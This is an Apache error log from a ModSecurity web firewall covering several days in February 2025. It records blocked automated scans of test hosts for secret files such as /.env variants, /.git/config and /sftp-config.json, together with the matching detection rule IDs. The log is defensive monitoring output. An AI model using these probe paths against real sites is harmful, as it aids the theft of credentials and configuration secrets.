[Sat Feb 08 02:55:45.269407 2025] [:error] [pid 1012475] [client 185.246.189.156:45398] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "Z6a5oWltQTN_w3JddQ9vvAAAAA4"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 20:50:42.289403 2025] [:error] [pid 1012650] [client 45.148.10.235:41386] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6e1kj2C4UdOfgg5hqhrUAAAAAM"]
[Sat Feb 08 20:50:42.290072 2025] [:error] [pid 1012650] [client 45.148.10.235:41386] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6e1kj2C4UdOfgg5hqhrUAAAAAM"]
[Sat Feb 08 20:50:42.290555 2025] [:error] [pid 1012650] [client 45.148.10.235:41386] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6e1kj2C4UdOfgg5hqhrUAAAAAM"]
[Sat Feb 08 20:50:42.500374 2025] [:error] [pid 1012664] [client 45.148.10.235:41388] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6e1kpb9xITnTJA1OeTIaAAAAAU"]
[Sat Feb 08 20:50:42.500962 2025] [:error] [pid 1012664] [client 45.148.10.235:41388] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6e1kpb9xITnTJA1OeTIaAAAAAU"]
[Sat Feb 08 20:50:42.501433 2025] [:error] [pid 1012664] [client 45.148.10.235:41388] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6e1kpb9xITnTJA1OeTIaAAAAAU"]
[Sat Feb 08 20:50:43.059542 2025] [:error] [pid 1014088] [client 45.148.10.235:41432] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6e1k80NMB6Tc4AK-RSVggAAAAc"]
[Sat Feb 08 20:50:43.060125 2025] [:error] [pid 1014088] [client 45.148.10.235:41432] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6e1k80NMB6Tc4AK-RSVggAAAAc"]
[Sat Feb 08 20:50:43.060567 2025] [:error] [pid 1014088] [client 45.148.10.235:41432] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z6e1k80NMB6Tc4AK-RSVggAAAAc"]
[Sat Feb 08 20:50:43.221989 2025] [:error] [pid 1012889] [client 45.148.10.235:41448] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6e1kwuKgHviPyAlimTMCwAAAAY"]
[Sat Feb 08 20:50:43.222709 2025] [:error] [pid 1012889] [client 45.148.10.235:41448] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6e1kwuKgHviPyAlimTMCwAAAAY"]
[Sat Feb 08 20:50:43.223174 2025] [:error] [pid 1012889] [client 45.148.10.235:41448] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z6e1kwuKgHviPyAlimTMCwAAAAY"]
[Sat Feb 08 20:50:43.385451 2025] [:error] [pid 1012647] [client 45.148.10.235:41450] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6e1k6ZJGcrIdR3jb3sqNQAAAAA"]
[Sat Feb 08 20:50:43.386039 2025] [:error] [pid 1012647] [client 45.148.10.235:41450] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6e1k6ZJGcrIdR3jb3sqNQAAAAA"]
[Sat Feb 08 20:50:43.386545 2025] [:error] [pid 1012647] [client 45.148.10.235:41450] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z6e1k6ZJGcrIdR3jb3sqNQAAAAA"]
[Sat Feb 08 20:50:43.654916 2025] [:error] [pid 1012651] [client 45.148.10.235:41456] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6e1kwAZ8GW85HFw1xnBMgAAAAQ"]
[Sat Feb 08 20:50:43.655501 2025] [:error] [pid 1012651] [client 45.148.10.235:41456] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6e1kwAZ8GW85HFw1xnBMgAAAAQ"]
[Sat Feb 08 20:50:43.655940 2025] [:error] [pid 1012651] [client 45.148.10.235:41456] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6e1kwAZ8GW85HFw1xnBMgAAAAQ"]
[Sat Feb 08 20:50:43.813437 2025] [:error] [pid 1012650] [client 45.148.10.235:41466] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6e1kz2C4UdOfgg5hqhrUQAAAAM"]
[Sat Feb 08 20:50:43.813925 2025] [:error] [pid 1012650] [client 45.148.10.235:41466] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6e1kz2C4UdOfgg5hqhrUQAAAAM"]
[Sat Feb 08 20:50:43.814342 2025] [:error] [pid 1012650] [client 45.148.10.235:41466] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6e1kz2C4UdOfgg5hqhrUQAAAAM"]
[Sat Feb 08 20:50:44.242860 2025] [authz_core:error] [pid 1012664] [client 45.148.10.235:41470] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sat Feb 08 20:50:44.425534 2025] [:error] [pid 1012648] [client 45.148.10.235:41472] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6e1lH6yKq4w0bofF2hiFAAAAAE"]
[Sat Feb 08 20:50:44.426083 2025] [:error] [pid 1012648] [client 45.148.10.235:41472] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6e1lH6yKq4w0bofF2hiFAAAAAE"]
[Sat Feb 08 20:50:44.426557 2025] [:error] [pid 1012648] [client 45.148.10.235:41472] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6e1lH6yKq4w0bofF2hiFAAAAAE"]
[Sat Feb 08 23:09:43.970324 2025] [:error] [pid 1014088] [client 194.233.73.109:43328] [client 194.233.73.109] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6fWJ80NMB6Tc4AK-RSVjAAAAAc"]
[Sat Feb 08 23:09:43.971056 2025] [:error] [pid 1014088] [client 194.233.73.109:43328] [client 194.233.73.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6fWJ80NMB6Tc4AK-RSVjAAAAAc"]
[Sat Feb 08 23:09:43.971540 2025] [:error] [pid 1014088] [client 194.233.73.109:43328] [client 194.233.73.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6fWJ80NMB6Tc4AK-RSVjAAAAAc"]
[Mon Feb 10 03:59:51.560808 2025] [:error] [pid 1055300] [client 35.181.51.73:59687] [client 35.181.51.73] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z6lrp7nxpYWmvaoZ30yYaQAAAAI"]
[Mon Feb 10 03:59:51.561439 2025] [:error] [pid 1055300] [client 35.181.51.73:59687] [client 35.181.51.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z6lrp7nxpYWmvaoZ30yYaQAAAAI"]
[Mon Feb 10 03:59:51.561911 2025] [:error] [pid 1055300] [client 35.181.51.73:59687] [client 35.181.51.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "Z6lrp7nxpYWmvaoZ30yYaQAAAAI"]
[Tue Feb 11 05:52:25.265664 2025] [:error] [pid 1076529] [client 176.65.134.181:54722] [client 176.65.134.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6rXiaMMJd38ptE1QSaz1wAAAAQ"]
[Tue Feb 11 05:52:25.267059 2025] [:error] [pid 1076529] [client 176.65.134.181:54722] [client 176.65.134.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6rXiaMMJd38ptE1QSaz1wAAAAQ"]
[Tue Feb 11 05:52:25.267520 2025] [:error] [pid 1076529] [client 176.65.134.181:54722] [client 176.65.134.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z6rXiaMMJd38ptE1QSaz1wAAAAQ"]
[Wed Feb 12 09:20:24.394066 2025] [:error] [pid 1098792] [client 54.84.249.63:48034] [client 54.84.249.63] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6xZyNUOjij4-p8qK54regAAAAI"]
[Wed Feb 12 09:20:24.396023 2025] [:error] [pid 1098792] [client 54.84.249.63:48034] [client 54.84.249.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6xZyNUOjij4-p8qK54regAAAAI"]
[Wed Feb 12 09:20:24.396268 2025] [:error] [pid 1098792] [client 54.84.249.63:48034] [client 54.84.249.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z6xZyNUOjij4-p8qK54regAAAAI"]
[Thu Feb 13 11:10:05.782820 2025] [:error] [pid 1121729] [client 35.180.115.24:58195] [client 35.180.115.24] ModSecurity: Rule 7f528b8aebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z63E_R5dR-dF5mjMZHPysAAAAAc"], referer: www.google.com
[Thu Feb 13 11:13:09.456900 2025] [:error] [pid 1120386] [client 35.180.115.24:58531] [client 35.180.115.24] ModSecurity: Rule 7f528b8aebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z63Ftaa_NDam8qn8o6q0dwAAAAI"], referer: www.google.com
[Fri Feb 14 17:21:47.365611 2025] [:error] [pid 1151893] [client 89.248.163.4:60452] [client 89.248.163.4] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tmxtvxyfpRpgp4okBKQAAAAw"]
